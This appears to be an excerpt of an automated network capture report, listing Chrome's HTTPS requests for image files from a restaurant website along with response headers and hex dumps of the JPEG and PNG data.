                                                                                                                                                    2024-10-01 04:26:56 UTC16031INData Raw: ff d8 ff e1 16 1c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 cb 00 00 01 01 00 03 00 00 00 01 03 b5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 36 3a 35 38 3a 35 31 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:09:27 16:58:51
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: 18 46 eb db e3 0b 72 fd 8b 12 a2 34 ef 5b 55 14 29 a0 b3 71 4d 69 01 cd b4 22 29 a4 e3 25 93 aa c7 ff 00 8d ea 16 2a 58 a9 63 68 f5 34 db 20 b9 14 e9 36 6c ee b6 db 69 eb d5 3b 67 b2 51 59 ab ea 2d 23 88 e8 d0 ad 7e 39 1a cd 9d 18 e2 fc 52 02 2e d5 8e cc 12 a3 c1 22 2c 56 eb cd 4d 82 d8 d7 2b cb ff 00 ae 50 cf 7e a7 2d 8d 64 9a d5 53 3c e1 5b 47 eb 77 37 72 e9 b4 b4 f5 15 bc 67 83 84 80 01 ea be c3 b6 4a b0 41 ed 3a ea b1 de f7 89 24 5b db db d7 25 fb 49 6d 76 b5 2e 4f 2d 6d 76 ba 7f c6 d6 dd 92 ac 55 e0 ab 1b 34 59 b2 80 da ae fc f1 b0 72 95 c4 ac 65 43 f6 1a fc b8 d7 6b 20 19 ec f3 2d 0a 35 55 96 3a bf 8d 4e 96 d2 08 66 af aa 85 21 96 9d 72 c2 59 1a 9e 53 dd b4 37 e8 ce b6 a2 91 82 e4 f7 e0 b1 77 4f b1 fa 1f f8 b8 9a b2 be 7e 01 cf f4 1b 11 9d 9a de 9a
                                                                                                                                                    Data Ascii: Fr4[U)qMi")%*Xch4 6li;gQY-#~9R.",VM+P~-dS<[Gw7rgJA:$[%Imv.O-mvU4YreCk -5U:Nf!rYS7wO~
                                                                                                                                                    2024-10-01 04:26:56 UTC15252INData Raw: 67 b6 63 f9 6d a1 96 3e 27 a8 ee ae 2d 58 8c 14 62 7f 55 33 65 ae 4c 56 98 99 39 d3 1b 28 96 f6 f6 b9 1e f5 cc 16 4f 44 f3 33 d6 ad dd eb 9b a7 99 28 83 42 7f 8e 8a ec 36 d6 f6 c2 23 52 89 7f 5b bf 3d 33 5e 72 d1 da f5 d1 3a 48 02 20 91 39 d4 36 0b 32 0e 54 09 be 30 cf a6 86 97 24 2f 19 ce 80 f2 97 42 1c 19 b3 ea d1 49 66 e8 16 dc 77 a6 14 92 74 a6 3e 06 ef 53 ed 6f 4a eb 04 48 18 a9 ee ba 7b ad 57 7e 1d b8 ba b7 0d b3 aa d3 b0 fc 44 3f 85 75 5f c4 dd ea 86 b7 6d a3 a0 91 4b b4 df da 16 ac 5e fb bb 97 17 18 0c 21 a7 c5 9d 11 61 be ec 83 f7 77 44 da b8 a7 f8 9a 5f 91 95 aa c6 ed 9a e7 97 b9 4d 49 6e e4 f2 90 7c b6 45 d5 dd f6 eb a6 a6 34 8e 33 5d b1 45 6c 8d 36 d7 b7 75 f0 55 1e 9e f3 57 97 b7 1a ae 3e 17 2e 91 cc df e1 ad 08 c6 1a 84 9d 46 a6 63 a4 52 d8
                                                                                                                                                    Data Ascii: gcm>'-XbU3eLV9(OD3(B6#R[=3^r:H 962T0$/BIfwt>SoJH{W~D?u_mK^!awD_MIn|E43]El6uUW>.FcR
                                                                                                                                                    2024-10-01 04:26:56 UTC13711INData Raw: f7 6e 30 4b 68 33 2c c7 94 7d 2a b7 b2 48 fc c5 c8 b9 bb b9 d3 72 3b 3e e5 b5 e4 4a 96 c8 74 fc 80 8c 81 22 ba eb 4b 91 39 89 ab 85 72 b6 20 47 16 a7 2e 20 84 48 07 d1 47 42 83 19 9e 03 d2 d4 06 93 bb bc d9 2a ca da 1e f3 f7 e9 8e b5 b0 b1 d8 b6 a1 63 e9 8d 4d 4c c5 8b 37 49 69 9f a5 40 91 a7 13 85 65 44 79 81 42 1c 49 14 12 d9 0d 6a d9 95 9e 9a 5b ec 74 b0 1a 51 86 1a 40 ee d6 b6 76 63 c7 1e 9a 66 2e cb 1d 04 ff 00 8a 91 ad 5c 65 76 12 1f 31 47 04 76 22 16 e1 18 a9 39 1d 35 e6 df bb 37 37 97 53 cd 61 01 1c 13 18 d7 e4 f3 4b a3 52 b9 31 a4 77 40 6a 6b 4e d3 7a c1 28 f3 99 ef 23 fd 2a d2 e2 66 a4 65 c3 aa 9b 75 b5 d3 b7 f8 90 ca e6 4b 72 07 62 ff 00 b5 fd 5a 7d ae f6 db 59 bf 6c e9 64 22 26 78 8f 12 d7 23 69 d5 12 0f 1e aa d2 4e 97 18 41 fe ea 83 99 35 98
                                                                                                                                                    Data Ascii: n0Kh3,}*Hr;>Jt"K9r G. HGB*cML7Ii@eDyBIj[tQ@vcf.\ev1Gv"9577SaKR1w@jkNz(#*feuKrbZ}Yld"&x#iNA5


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    132192.168.2.449899162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:56 UTC384OUTGET /assets/imgs/img_recipe_4.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:56 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:56 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 232926
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:56 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:56 UTC16030INData Raw: ff d8 ff e1 1f ec 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 b0 00 00 01 01 00 03 00 00 00 01 06 40 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 37 20 31 34 3a 32 39 3a 34 37 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*@(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:27 14:29:47
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: 41 24 b0 13 00 0d 7d 3a be 8d 4d fe 5b bf e8 28 0e 3e 22 67 ed 81 c5 af a7 d5 ae d2 60 96 4c a0 8b d2 bb 34 19 d3 9b 8b 63 fa 6d fb 83 9b 2f ad ee 82 e7 56 ed 6c 6f b7 db 63 eb 7b b7 ff 00 c1 a1 64 36 ac 6c 8a fd 53 6b b0 ec 7f b5 e0 ed 6c 80 00 e3 dd 5f bb df 67 bf fd 22 b3 93 8f 56 7d 6d 7e 30 7d 96 58 cf 55 95 34 cc c8 27 73 bd 40 ef 4f dc ef 7f bb d2 ff 00 48 9b 03 06 a6 d2 fc 73 2f 6d c3 e8 d7 58 dc 1d ed 73 99 b9 e6 db 76 fb 7d 4d f5 7e 89 5a 8c e3 21 72 26 ce 84 57 0c b8 9d 1c 13 c5 97 1f 09 95 90 28 d8 e1 98 fe b7 f2 93 77 1f 2a fc 77 4f a2 ea dc 5a 47 b0 ef 69 69 3b 7f cc 7f fd fd 74 3f b4 7f 43 f6 ff 00 b1 55 bc 53 11 b7 87 11 ce dd bb bd d1 fe 7f f8 35 cc f4 4c 2b 69 c8 2f 16 b7 1e da 9c 4b 1d 69 71 6b 9a 7d ad df ef 75 3f 9d f4 d8 df f4 6b b2
                                                                                                                                                    Data Ascii: A$}:M[(>"g`L4cm/Vloc{d6lSkl_g"V}m~0}XU4's@OHs/mXsv}M~Z!r&W(w*wOZGii;t?CUS5L+i/Kiqk}u?k
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: 36 ce 78 5e 9a bb 9f 33 c9 df ce f1 4b 4e cb e6 85 cc 37 51 77 9d 5a 77 59 04 56 1b 5e cb 64 57 8e cd 78 99 b9 7b 99 de 4e 65 c1 6e bc 08 ab db 82 a5 2f 38 f5 1e 43 d6 6e 54 b0 9e cb b5 88 9b 37 34 35 40 01 eb 1a e3 20 e0 1a ae 97 1c b7 0c f3 eb 6e ed 7d 04 dc 8d 8e 90 d9 c9 16 2c 02 2c 52 4e 8d a3 1d ac 3b 17 07 88 da cc be ef 13 d1 8b 2a d4 26 61 e8 56 ad 62 9d aa b6 da 4e 9f 3e f6 19 d9 fa 35 ad 74 8a ec d8 d9 39 5b 2d e9 e6 e7 8d 57 74 79 ef e9 f3 af 79 7e c4 97 e0 d2 4d d7 e4 64 87 49 e7 ab bd 27 ca d0 af 9f cf bd cb 39 7b 27 3e d6 2b 8e 74 8e ed 28 de 16 ea 41 5a a5 c8 68 5a 6b b9 da 17 d1 a9 9a 89 69 72 b4 7b 6c d9 be 6e a6 cc d5 9f 9e c1 d9 50 6b f2 0b d4 52 dd 49 33 57 0b 73 50 4c 9c fc 8f 45 9b db 0c 24 b5 5f d0 e7 2f 53 9d 4b 55 de e9 5f a6 ce
                                                                                                                                                    Data Ascii: 6x^3KN7QwZwYV^dWx{Nen/8CnT745@ n},,RN;*&aVbN>5t9[-Wtyy~MdI'9{'>+t(AZhZkir{lnPkRI3WsPLE$_/SKU_
                                                                                                                                                    2024-10-01 04:26:56 UTC15252INData Raw: 48 8d d9 48 d4 24 23 53 1e 46 a0 f5 62 82 88 02 aa 00 a2 00 a0 00 06 9f ff da 00 08 01 02 00 01 05 00 fe e8 fa b1 31 31 3d a7 b4 cc e4 66 7f 84 43 f4 0f 5c 4c 4c 4c 4c 4c 4c 4c 4c 4c 7a 18 47 a6 26 26 3f ab 83 31 31 30 27 b4 c8 99 13 94 cc cc cc cf d7 ed 06 27 b4 18 f4 cc cc cc cc cc cc cf f2 fd bf af 91 33 39 4e 46 64 cc 9f a4 7a 9f e8 0f e7 33 1e 83 f9 f3 33 ff 00 c2 0f e8 fd be 9c fa 66 66 66 67 ff 00 8a 1f d0 1f 41 87 d7 3e b9 fe 80 fe d0 fe 9e 7d 0c 3e b9 99 99 ff 00 e2 87 f5 44 23 d7 33 3f cd 65 ea 85 ac 76 8c cc b2 b6 e4 bf d9 1f d4 3e 99 f6 ba e4 a9 7f d9 a4 fd c7 68 37 b0 2a de 57 22 c5 33 94 07 3f c5 65 21 e1 0e a7 97 ba 5a 11 b9 02 2b 66 3f 4d f7 ad 2a 9d 8b 72 ad b9 af f3 08 60 fe 89 f4 3e bb 9b 41 14 da 5c 89 83 16 df c5 6b 20 e7 01 2e 61 3f
                                                                                                                                                    Data Ascii: HH$#SFb11=fC\LLLLLLLLLzG&&?110''39NFdz33fffgA>}>D#3?ev>h7*W"3?e!Z+f?M*r`>A\k .a?
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: 3e 8a 3d 82 66 31 e3 2c 50 c1 41 ae 16 cc e5 08 0f 06 14 63 3e bf 69 4b 65 55 83 0c 63 d0 99 91 09 99 99 9f 79 8c 47 24 92 84 cc 05 80 e0 85 c9 b4 f8 d6 c2 cc df 4e 09 2b ac e4 59 57 8c 28 c9 3a eb 8b 2a 61 08 e2 20 f6 88 e4 9e 39 84 05 1f 73 ea 9f 7f 5c 42 26 7e a3 98 b5 f2 57 3c 08 99 95 31 01 9e 0f 76 b6 bc 4f 66 05 0a 11 ef 30 44 c9 33 33 33 1e 9a f6 71 20 98 2d 18 ce 66 61 6c 0c e4 66 7d a7 97 dc 9c ce 22 60 08 c7 26 ac 02 06 63 af 29 6e 93 98 d5 b2 cc 19 c4 ce 06 0a c4 5e 09 05 aa c7 65 b2 57 fe d6 da 8a 45 ea 25 96 73 2d 99 c9 a0 e4 4f 26 81 80 9c 87 a1 f6 81 8e 69 04 36 27 b4 27 10 b6 61 33 33 30 7a 01 c8 b2 b4 ae a0 8a b8 59 60 0c b8 af 3e 12 20 25 43 1c c0 4a 9e 7c d0 9e 24 30 30 20 05 d8 b1 fb 7a 63 d4 1c 45 b8 88 db 10 5c c2 25 c0 82 72 19 8a
                                                                                                                                                    Data Ascii: >=f1,PAc>iKeUcyG$N+YW(:*a 9s\B&~W<1vOf0D333q -falf}"`&c)n^eWE%s-O&i6''a330zY`> %CJ|$00 zcE\%r
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: 6b b6 5d 9a f4 bb 01 4d 9b ed 55 49 fb 40 bf 88 ac e9 f4 ce e3 6b 1f 0d 2a ae f2 a5 26 dd dd 25 a9 eb b9 d5 b7 3b 2a 5e 57 d8 dd 51 db eb ed 53 da 57 e2 4d 87 56 0d 51 06 ea 55 cf 51 a3 4a f5 c7 56 cd 73 ad 4a 5a 36 45 b5 cd 87 5d f3 b9 55 2b 73 d0 d5 c0 44 ce 62 88 95 b5 80 75 6b 64 1f 1d b0 8a 3a 90 ac 35 8d 93 6a c0 75 f4 c8 31 ee 15 47 bb c9 36 f3 8c a5 9a fd 22 91 bf f2 00 b6 f6 5a e4 34 fd 3e 27 45 ec 1b 57 6a 1f 27 5f b7 5a ec dd 9b 05 c3 90 fd 6f 2c db d3 c1 ba 93 8d 2d 7a da ce cf 66 bd 8b cb 11 47 bd ce 18 f2 eb b5 5b 66 cb b5 bc 0c f4 9c 5a bc e9 35 9a 2b a8 12 8e ec 4d 4a 6c 7a 2f 7d 1b df 6b f6 2d 5d 75 a5 8d 8c e2 cb 82 b3 a6 43 64 b6 c9 0c 9d 5d a1 59 76 01 0b 74 57 26 2b e2 1b c3 1b 76 96 a1 46 d3 3a ed 6d 6c 1a 7b 4e ef b2 da b2 c2 25 6e
                                                                                                                                                    Data Ascii: k]MUI@k*&%;*^WQSWMVQUQJVsJZ6E]U+sDbukd:5ju1G6"Z4>'EWj'_Zo,-zfG[fZ5+MJlz/}k-]uCd]YvtW&+vF:ml{N%n
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: d7 55 5a a9 d6 7c 88 ea 1d 2e cf 57 7e bb 2e 55 6d fd ed 5d 1a db e4 3d 73 41 bb a5 71 6a f1 01 65 35 6c b2 ca f6 49 9f b7 e4 4c 66 73 22 69 11 94 60 54 b6 26 c9 25 88 09 11 4b cb 11 27 00 27 e3 31 82 ee ce 0a 98 c3 26 c3 5d b6 16 35 85 be f8 fa f6 39 14 71 94 d6 b8 d7 18 45 fb 13 88 5c 46 39 8e 25 ea 65 80 32 b7 b1 53 88 46 25 e7 2d 68 16 8f 9c 30 1a 11 4e 0f 5c f4 15 f9 15 cb 66 d5 8f cc ff 00 1d 63 05 b1 3f e3 18 0c 44 aa a6 b4 e9 68 db 5c e2 d2 85 36 1e c6 b0 06 99 ae d1 b5 66 6d a3 a7 6d 94 dd 36 d6 c2 9d 97 3d 5b 75 ba 49 b7 bf 47 64 5b b6 bb aa b6 8d 2d 6a 6d be f4 eb e9 a3 e4 a1 6c d9 ed 6a 71 b7 52 a5 7d b1 cd 9a 35 9a ab b2 be 4d b5 b7 6a 9d 32 0a 26 c7 13 60 b2 b0 96 62 66 53 ec c6 9e 42 90 79 e5 96 36 c5 ca 6a ec 30 37 77 ad 73 63 59 af af a8
                                                                                                                                                    Data Ascii: UZ|.W~.Um]=sAqje5lILfs"i`T&%K''1&]59qE\F9%e2SF%-h0N\fc?Dh\6fmm6=[uIGd[-jmljqR}5Mj2&`bfSBy6j07wscY
                                                                                                                                                    2024-10-01 04:26:56 UTC16336INData Raw: 1a 5f 43 a9 a7 b1 a3 68 36 1d 85 a5 6e e2 ad b2 14 36 d8 07 9b db 3a f7 ae bb 37 fb 1e 63 65 9e b6 d4 d8 46 0c d9 95 ee 86 85 12 d9 65 5c a1 4e 31 0f 29 b3 a6 b7 9b 34 6d 55 d9 e9 77 77 ee 3f f9 e6 e2 56 35 e8 f8 e6 9f 4b 8b 75 be 00 0a 5a 5c 66 f6 5e 5b f6 8a cd db 8b b7 b3 de 6a 78 36 b8 71 6d cd 62 c3 53 a3 b7 65 6c eb ad eb ae dd ec 36 43 53 d9 ec 4f f6 d7 06 af b3 66 96 6f 62 0d a1 60 6b fd ae d8 7b 26 bd 05 e1 d2 65 16 0e 6f d7 6b 5b a6 c2 d0 b2 db fd ce cc fd a0 60 b9 40 a7 57 67 78 f5 fd 3e e5 86 de b4 ea 2e d0 04 e9 ea 67 5f 7f 49 0d 9a 5b 4e b1 ae 6f 19 7b 23 f2 68 6b 76 8a be 30 ab 93 55 af 44 0f e6 6d 7e 54 5d 56 28 ba ea 92 c6 d6 0b c6 ab cd 6a bb 42 b2 bd 89 07 5d 96 c6 ad 88 95 38 61 c2 b6 8d 8a e2 de 4c f3 a1 98 aa 09 98 3d 47 d5 89 b7 ae
                                                                                                                                                    Data Ascii: _Ch6n6:7ceFe\N1)4mUww?V5KuZ\f^[jx6qmbSel6CSOfob`k{&eok[`@Wgx>.g_I[No{#hkv0UDm~T]V(jB]8aL=G
                                                                                                                                                    2024-10-01 04:26:56 UTC48INData Raw: 39 6f c0 85 da 6e 78 09 25 bf 4f a4 be 25 9e d2 35 23 02 08 c8 7f c5 ab 0f 47 0c 2c 4d cf b8 4b df a8 7f a8 85 e9 ee 3c 49 25 12 c9 23 99 1a 74
                                                                                                                                                    Data Ascii: 9onx%O%5#G,MK<I%#t
                                                                                                                                                    2024-10-01 04:26:56 UTC16384INData Raw: ee 23 5e 9d ac b2 e8 7d a3 7a 51 87 57 a8 ee 9f f6 97 b9 d5 64 b1 25 7c f5 f0 1e a5 d9 a2 8f 56 9f 46 24 ae d9 25 e2 b1 27 55 b4 0f db a7 b4 6d 77 6a ed 37 eb 5b b5 1b e0 4d e0 c9 48 97 96 3f a4 95 f5 d2 4a b6 ad 26 c8 dc f4 fa cd ba f5 75 72 3b a0 e9 7b b5 0b f9 1f ab 02 48 cf 48 ff 00 cc 63 b7 71 2d c9 e3 4b 0e 7d 25 8b e2 5a e4 61 b5 6d 21 79 97 a7 32 eb 72 cd fb 47 0f 76 97 da 5f a4 b3 9f 9c 6d 0b 5a 37 e8 ed cf ed d4 4a f3 1b 78 91 ee 14 e2 38 cc 87 82 2d 89 1a ac 75 6a ed ae cf c8 72 3d 1a 56 d7 ab 33 02 60 96 ae 89 23 95 cd 54 96 4c 1b 98 a3 01 b1 a4 4a b1 04 a4 4a 2e 58 92 2f 02 44 22 51 ec d5 cc ff 00 b7 ab fe 48 36 7f 22 db af fa be 69 69 e6 46 ae d1 6a 7d b9 0f 56 9b af e4 c2 89 9e 04 33 0a dc 86 48 9a 13 48 7a 9e 24 52 59 14 79 36 5c be 64 3c
                                                                                                                                                    Data Ascii: #^}zQWd%|VF$%'Umwj7[MH?J&ur;{HHcq-K}%Zam!y2rGv_mZ7Jx8-ujr=V3`#TLJJ.X/D"QH6"iiFj}V3HHz$RYy6\d<


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    133192.168.2.449900162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC389OUTGET /assets/imgs/food_menu_seafood.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:57 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:57 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 17355
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:57 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:57 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 2d 08 06 00 00 00 1e 03 6d 5a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR@-mZpHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:57 UTC1323INData Raw: 90 b4 50 d2 1d 2e ab 97 d4 20 69 8c a4 f9 2e 9b 11 da d4 4a ba 5d d2 d9 c1 9f 48 7e 41 77 49 dd ca e5 23 a4 c9 b7 4a 5a e7 b2 3a 49 47 49 5a e6 c9 48 d2 8e 02 13 6a 0b 93 7f d0 d7 3d 76 9a 7e 26 e9 5e 49 cf 4a 9a 1b 16 d8 24 69 b1 a4 9f 4b 9a 16 ca e5 c5 d7 65 84 d2 e5 02 90 a4 1b c2 22 91 34 49 d2 1a bb b1 13 8a dc 91 bd 41 28 1f 96 74 be a4 79 92 3e 66 41 e4 24 ed f3 f5 76 0b fa 89 4c df b9 a0 01 65 09 88 a4 09 dd 27 69 b9 07 3f ca 5e e0 58 49 3d 24 4d 91 74 a4 17 56 68 72 4d be 56 db eb db 62 8f 6f 97 db 11 f2 1c 49 27 98 4c c9 71 83 24 80 bd e5 d2 80 2c 15 ee 0d fc d1 60 b4 0f 78 dc 8e 10 b6 0c ed f1 f5 84 e4 27 06 20 6c 01 fe 05 dc 0d d4 17 40 f5 ee be 7e 3e 03 c2 65 f1 12 e3 43 5a 54 ff 40 8a 36 d8 9c 5d e2 e7 46 e0 b8 3c 44 27 09 e0 78 a0 0d b8 1f
                                                                                                                                                    Data Ascii: P. i.J]H~AwI#JZ:IGIZHj=v~&^IJ$iKe"4IA(ty>fA$vLe'i?^XI=$MtVhrMVboI'Lq$,`x' l@~>eCZT@6]F<D'x


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    134192.168.2.449901162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:57 UTC384OUTGET /assets/imgs/img_recipe_6.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:57 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:57 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:03:10 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 92120
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:57 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:57 UTC16031INData Raw: ff d8 ff e1 12 b6 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 b0 00 00 01 01 00 03 00 00 00 01 06 40 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 39 3a 30 33 3a 30 37 00 00 00 00 04 90 00 00 07 00
